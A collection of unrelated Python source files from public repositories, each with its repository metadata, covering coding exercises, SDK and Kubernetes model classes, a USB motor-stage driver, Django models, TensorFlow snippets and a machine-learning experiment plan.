fc185038f57e0c5cbb82a74cebd4fe00422416cb
|
5788bd7b154649d2f787bbc4feb717ff2f4b4c59
|
refs/heads/master
| 2020-11-30T04:56:25.553327
| 2017-10-22T07:11:01
| 2017-10-22T07:11:01
| 96,705,212
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
# -*- encoding: utf-8 -*-
# Logger Rate Limiter 记录速率限制器
# 这道题让我们设计一个记录系统每次接受信息并保存时间戳,然后让我们打印出该消息,前提是最近10秒内没有打印出这个消息
# Example:
# Logger logger = new Logger();
#
# // logging string "foo" at timestamp 1
# logger.shouldPrintMessage(1, "foo"); returns true;
#
# // logging string "bar" at timestamp 2
# logger.shouldPrintMessage(2,"bar"); returns true;
#
# // logging string "foo" at timestamp 3
# logger.shouldPrintMessage(3,"foo"); returns false;
#
# // logging string "bar" at timestamp 8
# logger.shouldPrintMessage(8,"bar"); returns false;
#
# // logging string "foo" at timestamp 10
# logger.shouldPrintMessage(10,"foo"); returns false;
#
# // logging string "foo" at timestamp 11
# logger.shouldPrintMessage(11,"foo"); returns true;
class Logger():
def __init__(self):
self.message = {}
def shouldPrintMessage(self,time,str):
if self.message.has_key(str):
if time - self.message[str] > 10:
return True
else:
return False
else:
self.message[str] = time
return True
|
[
"dundunmao@gmail.com"
] |
dundunmao@gmail.com
|
0f87356dc8737967c17be6fb9a93469fbc84b1dc
|
e42a61b7be7ec3412e5cea0ffe9f6e9f34d4bf8d
|
/a10sdk/core/gslb/gslb_geoloc_rdt_oper.py
|
a354a4599bd1c8491c401a33f89f34e99d66ee21
|
[
"Apache-2.0"
] |
permissive
|
amwelch/a10sdk-python
|
4179565afdc76cdec3601c2715a79479b3225aef
|
3e6d88c65bd1a2bf63917d14be58d782e06814e6
|
refs/heads/master
| 2021-01-20T23:17:07.270210
| 2015-08-13T17:53:23
| 2015-08-13T17:53:23
| 40,673,499
| 0
| 0
| null | 2015-08-13T17:51:35
| 2015-08-13T17:51:34
| null |
UTF-8
|
Python
| false
| false
| 3,000
|
py
|
from a10sdk.common.A10BaseClass import A10BaseClass
class GeolocRdtList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param rdt: {"type": "number", "format": "number"}
:param site_name: {"type": "string", "format": "string"}
:param gl_name: {"type": "string", "format": "string"}
:param type: {"type": "string", "format": "string"}
:param age: {"type": "number", "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "geoloc-rdt-list"
self.DeviceProxy = ""
self.rdt = ""
self.site_name = ""
self.gl_name = ""
self.A10WW_type = ""
self.age = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Oper(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param geoloc_rdt_list: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"rdt": {"type": "number", "format": "number"}, "optional": true, "site-name": {"type": "string", "format": "string"}, "gl-name": {"type": "string", "format": "string"}, "type": {"type": "string", "format": "string"}, "age": {"type": "number", "format": "number"}}}]}
:param geo_name: {"type": "string", "format": "string"}
:param site_name: {"type": "string", "format": "string"}
:param active_status: {"type": "string", "format": "string"}
:param total_rdt: {"type": "number", "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "oper"
self.DeviceProxy = ""
self.geoloc_rdt_list = []
self.geo_name = ""
self.site_name = ""
self.active_status = ""
self.total_rdt = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class GeolocRdt(A10BaseClass):
"""Class Description::
Operational Status for the object geoloc-rdt.
Class geoloc-rdt supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/gslb/geoloc-rdt/oper`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "geoloc-rdt"
self.a10_url="/axapi/v3/gslb/geoloc-rdt/oper"
self.DeviceProxy = ""
self.oper = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
|
[
"doug@parksidesoftware.com"
] |
doug@parksidesoftware.com
|
d21833248f0bdec9ce0f4b88c983939bacd74938
|
4f1fa59cc81dbaabf41c9e95108b643d00faceb9
|
/ros/actuation/stage/nodes/StageDevice.py
|
e2a4e44a9b722baa74204c36c0ee7ad2f637ad59
|
[] |
no_license
|
florisvb/Flyatar
|
7f31bb27108f6da785e67a2b92f56e7bc0beced0
|
dfaf30bcb77d6c95cab67ad280615722a11814c3
|
refs/heads/master
| 2021-01-01T15:44:54.827787
| 2010-06-24T01:24:06
| 2010-06-24T01:24:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,686
|
py
|
#!/usr/bin/env python
#
# StageDevice.py
#
# Control interface for at90usb based xyfly stage board.
# Provides python module and a command line utility.
#
# Note, need to set permissions correctly to get device to respond to nonroot
# users. This required adding and rules file to udev/rules.d and adding a
# group.
#
# who when what
# --- ---- ----
# pjp 08/19/09 version 1.0
# ---------------------------------------------------------------------------
from __future__ import division
import USBDevice
import ctypes
import time
# XYFly stage device parameters
_motor_num = 3
# Input/Output Structures
class MotorState_t(ctypes.LittleEndianStructure):
_pack_ = 1
_fields_ =[('Frequency', ctypes.c_uint16),
('Position', ctypes.c_uint16)]
class USBPacketOut_t(ctypes.LittleEndianStructure):
_pack_ = 1
_fields_ =[('MotorUpdate', ctypes.c_uint8),
('SetPoint', MotorState_t * _motor_num)]
class USBPacketIn_t(ctypes.LittleEndianStructure):
_pack_ = 1
_fields_ =[('MotorState', MotorState_t * _motor_num)]
class StageDevice(USBDevice.USB_Device):
def __init__(self, serial_number=None):
# USB device parameters
self.vendor_id = 0x0004
self.product_id = 0x0002
self.bulkout_ep_address = 0x01
self.bulkin_ep_address = 0x82
self.buffer_out_size = 64
self.buffer_in_size = 64
self.serial_number = serial_number
USBDevice.USB_Device.__init__(self,
self.vendor_id,
self.product_id,
self.bulkout_ep_address,
self.bulkin_ep_address,
self.buffer_out_size,
self.buffer_in_size,
self.serial_number)
# USB Command IDs
self.USB_CMD_GET_STATE = ctypes.c_uint8(1)
self.USB_CMD_SET_STATE = ctypes.c_uint8(2)
self.USBPacketOut = USBPacketOut_t()
self.USBPacketIn = USBPacketIn_t()
# self.Motor = []
# for MotorN in range(_motor_num):
# self.Motor.append({'Frequency' : 0,
# 'FrequencyMax' : FREQUENCY_MAX,
# 'Position' : 0,
# 'PositionMin' : POSITION_MIN,
# 'PositionMax' : POSITION_MAX,
# 'PositionSetPoint' : 0,
# 'Direction' : 0})
# Parameters
self.frequency_max = 30000
self.position_min = 0
self.position_max = 44000
self.steps_per_mm = 5000/25.4 # 5000 steps per inch
# 25.4 mm per inch
self.steps_per_radian = 200 # Change to actual number!
self.axis_x = 0
self.axis_y = 1
self.axis_theta = 2
self.x_vel_mm = 0
self.x_vel_steps = 0
self.y_vel_mm = 0
self.y_vel_steps = 0
self.x_pos_mm = 0
self.x_pos_steps = 0
self.y_pos_mm = 0
self.y_pos_steps = 0
def update_velocity(self, x_velocity, y_velocity):
self.x_vel_mm = x_velocity
self.y_vel_mm = y_velocity
self.x_vel_steps = self._mm_to_steps(self.x_vel_mm)
self.y_vel_steps = self._mm_to_steps(self.y_vel_mm)
if self.x_vel_steps < 0:
self.x_pos_steps = self.position_min
self.x_vel_steps = abs(self.x_vel_steps)
else:
self.x_pos_steps = self.position_max
if self.y_vel_steps < 0:
self.y_pos_steps = self.position_min
self.y_vel_steps = abs(self.y_vel_steps)
else:
self.y_pos_steps = self.position_max
if self.x_vel_steps > self.frequency_max:
self.x_vel_steps = self.frequency_max
if self.y_vel_steps > self.frequency_max:
self.y_vel_steps = self.frequency_max
self._set_frequency(self.axis_x,self.x_vel_steps)
self._set_position(self.axis_x,self.x_pos_steps)
self._set_frequency(self.axis_y,self.y_vel_steps)
self._set_position(self.axis_y,self.y_pos_steps)
self._set_motor_state()
x,y,theta,x_velocity,y_velocity,theta_velocity = self.return_state()
return x,y,theta,x_velocity,y_velocity,theta_velocity
def get_state(self):
self._get_motor_state()
x,y,theta,x_velocity,y_velocity,theta_velocity = self.return_state()
return x,y,theta,x_velocity,y_velocity,theta_velocity
def return_state(self):
x_velocity = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_x].Frequency)
x = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_x].Position)
y_velocity = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_y].Frequency)
y = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_y].Position)
theta_velocity = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_theta].Frequency)
theta = self._steps_to_mm(self.USBPacketIn.MotorState[self.axis_theta].Position)
return x,y,theta,x_velocity,y_velocity,theta_velocity
def _mm_to_steps(self,quantity_mm):
return quantity_mm*self.steps_per_mm
def _steps_to_mm(self,quantity_steps):
return quantity_steps/self.steps_per_mm
def _set_frequency(self,axis,freq):
self.USBPacketOut.SetPoint[axis].Frequency = int(freq)
def _set_position(self,axis,pos):
self.USBPacketOut.SetPoint[axis].Position = int(pos)
def _get_motor_state(self):
outdata = [self.USB_CMD_GET_STATE]
intypes = [ctypes.c_uint8, USBPacketIn_t]
val_list = self.usb_cmd(outdata,intypes)
cmd_id = val_list[0]
self._check_cmd_id(self.USB_CMD_GET_STATE,cmd_id)
self.USBPacketIn = val_list[1]
def _set_motor_state(self):
self.USBPacketOut.MotorUpdate = ctypes.c_uint8(7)
outdata = [self.USB_CMD_SET_STATE, self.USBPacketOut]
intypes = [ctypes.c_uint8, USBPacketIn_t]
val_list = self.usb_cmd(outdata,intypes)
cmd_id = val_list[0]
self._check_cmd_id(self.USB_CMD_SET_STATE,cmd_id)
self.USBPacketIn = val_list[1]
def _print_motor_state(self):
print '*'*20
print 'Frequency X = ', self.USBPacketIn.MotorState[self.axis_x].Frequency
print 'Position X = ', self.USBPacketIn.MotorState[self.axis_x].Position
print 'Frequency Y = ', self.USBPacketIn.MotorState[self.axis_y].Frequency
print 'Position Y = ', self.USBPacketIn.MotorState[self.axis_y].Position
print 'Frequency Theta = ', self.USBPacketIn.MotorState[self.axis_theta].Frequency
print 'Position Theta = ', self.USBPacketIn.MotorState[self.axis_theta].Position
print '*'*20
def _check_cmd_id(self,expected_id,received_id):
"""
Compares expected and received command ids.
Arguments:
expected_id = expected command id
received_is = received command id
Return: None
"""
if not expected_id.value == received_id.value:
msg = "received incorrect command ID %d expected %d"%(received_id.value,expected_id.value)
raise IOError, msg
return
#-------------------------------------------------------------------------------------
if __name__ == '__main__':
print "Opening XYFly stage device ..."
dev = StageDevice()
dev.print_values()
dev.close()
print "XYFly stage device closed."
|
[
"peterpolidoro@gmail.com"
] |
peterpolidoro@gmail.com
|
dea37d8cb8f20edbd9efe4496eee91c1a0e07810
|
d37f798101bc6cc795b3ff7e5f9444ff30b4cd83
|
/kubernetes/client/models/v1alpha2_pod_scheduling_context_status.py
|
6c66c9464423da9126cd1786a1a8d2b186fe4809
|
[
"Apache-2.0"
] |
permissive
|
MorningSong/python
|
bdd8b9d60b7c2185457fc1bbbc64d098f9682981
|
ae7b5ddd219fe09b6ed0be715dcca3377a029584
|
refs/heads/master
| 2023-08-30T14:41:41.582335
| 2023-08-23T16:15:28
| 2023-08-23T16:15:28
| 139,396,247
| 0
| 0
|
Apache-2.0
| 2023-09-14T00:11:24
| 2018-07-02T05:47:43
|
Python
|
UTF-8
|
Python
| false
| false
| 4,167
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.27
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1alpha2PodSchedulingContextStatus(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'resource_claims': 'list[V1alpha2ResourceClaimSchedulingStatus]'
}
attribute_map = {
'resource_claims': 'resourceClaims'
}
def __init__(self, resource_claims=None, local_vars_configuration=None): # noqa: E501
"""V1alpha2PodSchedulingContextStatus - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._resource_claims = None
self.discriminator = None
if resource_claims is not None:
self.resource_claims = resource_claims
@property
def resource_claims(self):
"""Gets the resource_claims of this V1alpha2PodSchedulingContextStatus. # noqa: E501
ResourceClaims describes resource availability for each pod.spec.resourceClaim entry where the corresponding ResourceClaim uses \"WaitForFirstConsumer\" allocation mode. # noqa: E501
:return: The resource_claims of this V1alpha2PodSchedulingContextStatus. # noqa: E501
:rtype: list[V1alpha2ResourceClaimSchedulingStatus]
"""
return self._resource_claims
@resource_claims.setter
def resource_claims(self, resource_claims):
"""Sets the resource_claims of this V1alpha2PodSchedulingContextStatus.
ResourceClaims describes resource availability for each pod.spec.resourceClaim entry where the corresponding ResourceClaim uses \"WaitForFirstConsumer\" allocation mode. # noqa: E501
:param resource_claims: The resource_claims of this V1alpha2PodSchedulingContextStatus. # noqa: E501
:type: list[V1alpha2ResourceClaimSchedulingStatus]
"""
self._resource_claims = resource_claims
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha2PodSchedulingContextStatus):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1alpha2PodSchedulingContextStatus):
return True
return self.to_dict() != other.to_dict()
|
[
"yliao@google.com"
] |
yliao@google.com
|
8d44940c93f41db2928de8cf2a87441142228f87
|
2970291ff52e98915abb47848aeb71517ed1fbab
|
/Calendar/migrations/0022_auto_20200405_1326.py
|
bd6f6fb6f31742fecf4543426da49ea7cd50f696
|
[] |
no_license
|
dannyswolf/MLShop_Django_Service_boook
|
dd33f4bb0352836897448bc45bbb09b7c49252c2
|
9ac5f85468487a53465e244ba31b9bc968300783
|
refs/heads/master
| 2023-07-15T15:06:53.298042
| 2021-08-29T11:49:42
| 2021-08-29T11:49:42
| 255,998,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
# Generated by Django 3.0.4 on 2020-04-05 13:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Calendar', '0021_auto_20200405_1321'),
]
operations = [
migrations.AlterField(
model_name='calendar',
name='Σημειώσεις',
field=models.CharField(blank=True, max_length=5000, null=True),
),
]
|
[
"ntinisiordanis@gmail.com"
] |
ntinisiordanis@gmail.com
|
a2dc7d962e925ae61393016853778208544ae2cf
|
361459069b1b2eb5adb180d1f61241742d2fbcd8
|
/chapter19/web_connect_test.py
|
fce8848c7c0dfe21207a76daa684fa204abaff31
|
[] |
no_license
|
tangkaiyang/python3_laioxuefeng
|
1704e72163aa55ce177e5b7a88a3e7501b415ceb
|
02400db01f144417ef202e6c135561c304cacb3a
|
refs/heads/master
| 2020-04-28T15:13:17.163004
| 2019-08-06T07:53:18
| 2019-08-06T07:53:18
| 175,364,941
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
# -*- coding:UTF-8 -*-
# 用asyncio的异步网络连接来获取sina,sohu和163的网站首页:
import asyncio
@asyncio.coroutine
def wget(host):
print('wget %s...' % host)
connect = asyncio.open_connection(host, 80)
reader, writer = yield from connect
header = 'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' % host
writer.write(header.encode('utf-8'))
yield from writer.drain()
while True:
line = yield from reader.readline()
if line == b'\r\n':
break
print('%s header > %s' % (host, line.decode('utf-8').rstrip()))
# Ignore the body, close the socket
writer.close()
loop = asyncio.get_event_loop()
tasks = [wget(host) for host in ['www.sina.com.cn', 'www.sohu.com', 'www.163.com']]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
|
[
"945541696@qq.com"
] |
945541696@qq.com
|
e45eaf86cbf8d480bd4e852ab5145b3d56778d7c
|
9ed7bd97e2140c69091aef63a8de1991e3bc7f3d
|
/递归/简单递归例子.py
|
8eb57c77374ff9d8e0a81030c185d1bed6d231e9
|
[] |
no_license
|
EruDev/Learn_Algorithms
|
d8a422d02f000ba428bc05f80cdf40860504946a
|
71c98599d84a33727fc434826bab800311053d8e
|
refs/heads/master
| 2020-03-15T12:42:22.625351
| 2018-07-30T02:30:04
| 2018-07-30T02:30:04
| 132,150,091
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
# coding: utf-8
def countdown(i):
if i < 0:
return
else:
countdown(i - 1)
print(i)
if __name__ == '__main__':
countdown(100)
|
[
"1027926875@qq.com"
] |
1027926875@qq.com
|
32e507dd74d087d7274fd08b3587e4d135fa1fbe
|
a9063fd669162d4ce0e1d6cd2e35974274851547
|
/test/test_tsp_account1.py
|
4676fce503d1768ca6306fed2f92039a0e1746ba
|
[] |
no_license
|
rootalley/py-zoom-api
|
9d29a8c750e110f7bd9b65ff7301af27e8518a3d
|
bfebf3aa7b714dcac78be7c0affb9050bbce8641
|
refs/heads/master
| 2022-11-07T14:09:59.134600
| 2020-06-20T18:13:50
| 2020-06-20T18:13:50
| 273,760,906
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,376
|
py
|
# coding: utf-8
"""
Zoom API
The Zoom API allows developers to safely and securely access information from Zoom. You can use this API to build private services or public applications on the [Zoom App Marketplace](http://marketplace.zoom.us). To learn how to get your credentials and create private/public applications, read our [Authorization Guide](https://marketplace.zoom.us/docs/guides/authorization/credentials). All endpoints are available via `https` and are located at `api.zoom.us/v2/`. For instance you can list all users on an account via `https://api.zoom.us/v2/users/`. # noqa: E501
OpenAPI spec version: 2.0.0
Contact: developersupport@zoom.us
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from models.tsp_account1 import TSPAccount1 # noqa: E501
from swagger_client.rest import ApiException
class TestTSPAccount1(unittest.TestCase):
"""TSPAccount1 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTSPAccount1(self):
"""Test TSPAccount1"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.tsp_account1.TSPAccount1() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"github@rootalley.com"
] |
github@rootalley.com
|
5cf7b38d124d0c0e7bf9b0f518fef34621713742
|
576cc83449e10fd3f98281970c46016ea7a5aea2
|
/Tensorflow/CNN/模型的保存与恢复.py
|
5afbe1506eead1e2b7385c4097be42da24c579d7
|
[] |
no_license
|
HotView/PycharmProjects
|
215ab9edd341e3293daebcf86d97537f8cd28d75
|
61393fe5ba781a8c1216a5cbe7e0d06149a10190
|
refs/heads/master
| 2020-06-02T07:41:53.608742
| 2019-11-13T08:31:57
| 2019-11-13T08:31:57
| 191,085,178
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 578
|
py
|
import tensorflow as tf
## 模型的保存
save_path ='...'
saver = tf.train.Saver()
sess = tf.Session()
saver.save(sess,save_path)
## 模型的恢复
save_path = ".."
saver = tf.train.Saver()
sess= tf.Session()
saver.restore(sess,save_path)
## 多次模型的保存和恢复
save_path = ".."
saver = tf.train.Saver()
sess= tf.Session()
epoch = 5
n =None
if epoch%n==0:
saver.save(sess,save_path,global_step=epoch)
## 恢复最新的模型
save_path = ".."
model = tf.train.latest_checkpoint(save_path)
saver = tf.train.Saver()
sess= tf.Session()
saver.restore(sess,model)
|
[
"864773190@qq.com"
] |
864773190@qq.com
|
b9fc0aa48976be5a27682e1ba77b1e50abc59b40
|
be3c759bd915887a384d1ef437ebf7277c75bd06
|
/DynamicProgramming/BestTimeToBuyAndSellStock.py
|
dbf1090d26ca00a049bf614f03d64d5d63303251
|
[] |
no_license
|
yistar-traitor/LeetCode
|
c24411763d541b6eaf9ccc344c3fd24f9a00e633
|
0dd48b990f8bd0874630b1860361c6b3b2c801f6
|
refs/heads/master
| 2020-09-28T20:46:45.016872
| 2019-12-18T02:25:34
| 2019-12-18T02:25:34
| 226,861,515
| 0
| 0
| null | 2019-12-18T02:25:36
| 2019-12-09T12:04:01
| null |
UTF-8
|
Python
| false
| false
| 2,292
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/24 0:03
# @Author : tc
# @File : BestTimeToBuyAndSellStock.py
"""
给定一个数组,它的第 i 个元素是一支给定股票第 i 天的价格。
如果你最多只允许完成一笔交易(即买入和卖出一支股票),设计一个算法来计算你所能获取的最大利润。
注意你不能在买入股票前卖出股票
Input1:[7,1,5,3,6,4]
Output1:5
解释: 在第 2 天(股票价格 = 1)的时候买入,在第 5 天(股票价格 = 6)的时候卖出,最大利润 = 6-1 = 5 。
注意利润不能是 7-1 = 6, 因为卖出价格需要大于买入价格。
Input1:[7,6,4,3,1]
Output1:0
解释: 在这种情况下, 没有交易完成, 所以最大利润为 0。
提示:动态规划 前i天的最大收益 = max{前i-1天的最大收益,第i天的价格-前i-1天中的最小价格}
优化后的代码真优雅
"""
#解法1
def maxProfit(prices):
m = len(prices)
if m in [0,1]:
return 0
dp = [0] * m
min_buy = float('inf')
for i in range(m-1):
min_buy = min(min_buy, prices[i])
if prices[i+1] >= prices[i]:
dp[i+1] = max(dp[i], prices[i+1] - min_buy)
else:
dp[i+1] = dp[i]
return dp[-1]
#优化后
def maxProfit2(prices):
min_p, max_p = 999999, 0
for i in range(len(prices)):
min_p = min(min_p, prices[i])
max_p = max(max_p, prices[i] - min_p)
return max_p
#解法二:利用状态机具体参考含手续费那题
"""
状态转移:
手里持有股票 -> 观望 -> 手里有股票
手里没有股票 -> 买入 -> 手里有股票
手里持有股票 -> 抛出 -> 手里没有股票
手里没有股票 -> 观望 -> 手里没有股票
"""
def maxProfit3(prices):
m = len(prices)
if not m:
return 0
dp_hold = [0] * m
dp_cash = [0] * m
dp_hold[0] = -prices[0]
for i in range(1, m):
dp_hold[i] = max(dp_hold[i - 1], -prices[i]) #注意这里,由于只有一次买入和抛出的机会,所以手里持有股票的最大收益就是购买该股票的成本
dp_cash[i] = max(dp_cash[i - 1],dp_hold[i -1] + prices[i])
return dp_cash[-1]
if __name__ == '__main__':
prices = [7,6,4,3,1]
print(maxProfit(prices))
|
[
"2448424636@qq.com"
] |
2448424636@qq.com
|
2eb85d7c15450d4573568b284adfb1ab5a709c2d
|
d389c87cd0c160a0efad8f6eb1eefc221af35147
|
/api/models.py
|
9368acaeaef04b3cffd21f8d4ab6380b1ac3c700
|
[] |
no_license
|
shotaro0726/drf-vue1
|
a9bced0c937b03fbd55f5f7e90c945bfadef560f
|
be68ee78d786029b1f7d3da1490312d6b5c096b0
|
refs/heads/master
| 2022-09-03T07:49:23.861354
| 2020-05-24T12:05:31
| 2020-05-24T12:05:31
| 265,808,817
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,637
|
py
|
from django.db import models
from user.models import User
from markdownx.models import MarkdownxField
from markdownx.utils import markdown
class Category(models.Model):
name = models.CharField(max_length=25, unique=True)
post_num = models.IntegerField(default=0, null=False)
description = models.TextField(blank=True)
def __str__(self):
return self.name
def get_name(self):
return self.name
class Post(models.Model):
title = models.CharField(max_length=30)
content = MarkdownxField()
created = models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(User, on_delete=models.PROTECT)
category = models.ForeignKey(Category, blank=True, null=True, on_delete=models.SET_NULL)
class Meta:
ordering = ['-created',]
def __str__(self):
return '{} :: {}'.format(self.title, self.author)
def get_absolute_url(self):
return '/blog/{}/'.format(self.pk)
def get_update_url(self):
return self.get_absolute_url() + 'update/'
def get_markdown_content(self):
return markdown(self.content)
class Comment(models.Model):
post = models.ForeignKey(Post, related_name='comments', on_delete=models.CASCADE)
text = MarkdownxField()
authir = models.ForeignKey(User, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
def get_markdown_content(self):
return markdown(self.text)
def get_absolute_url(self):
return self.post.get_absolute_url() + '#commnet-id-{}'.format(self.pk)
|
[
"shoutaro0726@gmail.com"
] |
shoutaro0726@gmail.com
|
a55e9c23dd7f6b0f13a8454e381e54949fe5a30a
|
9f9f4280a02f451776ea08365a3f119448025c25
|
/plans/hsppw/qcut_hsp-s_025_pwde_mlpc_hs.py
|
01b83466a393659ca5738a2724501fe600601146
|
[
"BSD-2-Clause"
] |
permissive
|
dbis-uibk/hit-prediction-code
|
6b7effb2313d2499f49b2b14dd95ae7545299291
|
c95be2cdedfcd5d5c27d0186f4c801d9be475389
|
refs/heads/master
| 2023-02-04T16:07:24.118915
| 2022-09-22T12:49:50
| 2022-09-22T12:49:50
| 226,829,436
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,161
|
py
|
"""Plan using all features."""
import os.path
from dbispipeline.evaluators import CvEpochEvaluator
from sklearn.neural_network import MLPClassifier
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler
import hit_prediction_code.common as common
from hit_prediction_code.dataloaders import ClassLoaderWrapper
from hit_prediction_code.dataloaders import EssentiaLoader
from hit_prediction_code.dataloaders import QcutLoaderWrapper
import hit_prediction_code.evaluations as evaluations
from hit_prediction_code.models.pairwise import PairwiseOrdinalModel
from hit_prediction_code.result_handlers import print_results_as_json
from hit_prediction_code.transformers.label import compute_hit_score_on_df
PATH_PREFIX = 'data/hit_song_prediction_msd_bb_lfm_ab/processed'
number_of_classes = 25
dataloader = ClassLoaderWrapper(
wrapped_loader=QcutLoaderWrapper(
wrapped_loader=EssentiaLoader(
dataset_path=os.path.join(
PATH_PREFIX,
'hsp-s_acousticbrainz.parquet',
),
features=[
*common.all_no_year_list(),
],
label='yang_hit_score',
nan_value=0,
data_modifier=lambda df: compute_hit_score_on_df(
df,
pc_column='lastfm_playcount',
lc_column='lastfm_listener_count',
hit_score_column='yang_hit_score',
),
),
number_of_bins=number_of_classes,
),
labels=list(range(number_of_classes)),
)
pipeline = Pipeline([
('scale', MinMaxScaler()),
('model',
PairwiseOrdinalModel(
wrapped_model=MLPClassifier(
hidden_layer_sizes=(256, 128, 128, 128, 64),
verbose=True,
),
pairs_factor=3.,
threshold_type='average',
pair_strategy='random',
pair_encoding='delta',
threshold_sample_training=False,
)),
])
evaluator = CvEpochEvaluator(
cv=evaluations.cv(),
scoring=evaluations.metrics.ordinal_classifier_scoring(),
scoring_step_size=1,
)
result_handlers = [
print_results_as_json,
]
|
[
"mikevo-uibk@famv.net"
] |
mikevo-uibk@famv.net
|
8c65456eca2603036d5dbbcba1658c39a7b9998b
|
babaa6284820ae5ede8e0bb257cb802913ebe976
|
/ML01-Python_Introduction/05_boolean_true_false.py
|
d92aa8f2e5de06ea1f65f5df33e7d8a3b9ac8b6b
|
[] |
no_license
|
kevinelong/ML
|
c6a69be96202248214ed3c0db5d2514be8559411
|
93f430e31f1470cf1ac3ab6ee8ab5d701b3fc6e7
|
refs/heads/master
| 2023-05-02T12:08:32.693948
| 2021-05-21T19:21:28
| 2021-05-21T19:21:28
| 369,008,732
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
isCool = True
isTooCool = False
print(isCool)
isGreater: bool = 3 > 2
isSame: bool = 2 + 2 == 4
print(isGreater)
print(isSame)
|
[
"kevinelong@gmail.com"
] |
kevinelong@gmail.com
|
a0a6c50f47ed536930fa9134d3ec75092e91ac68
|
6b791247919f7de90c8402abcca64b32edd7a29b
|
/lib/coginvasion/hood/DGSafeZoneLoader.py
|
424ee7563b7c2f46dbeca8897532f40739267a72
|
[
"Apache-2.0"
] |
permissive
|
theclashingfritz/Cog-Invasion-Online-Dump
|
a9bce15c9f37b6776cecd80b309f3c9ec5b1ec36
|
2561abbacb3e2e288e06f3f04b935b5ed589c8f8
|
refs/heads/master
| 2021-01-04T06:44:04.295001
| 2020-02-14T05:23:01
| 2020-02-14T05:23:01
| 240,434,213
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,152
|
py
|
# uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: lib.coginvasion.hood.DGSafeZoneLoader
from lib.coginvasion.holiday.HolidayManager import HolidayType
import SafeZoneLoader, DGPlayground
class DGSafeZoneLoader(SafeZoneLoader.SafeZoneLoader):
def __init__(self, hood, parentFSM, doneEvent):
SafeZoneLoader.SafeZoneLoader.__init__(self, hood, parentFSM, doneEvent)
self.playground = DGPlayground.DGPlayground
self.pgMusicFilename = 'phase_8/audio/bgm/DG_nbrhood.mid'
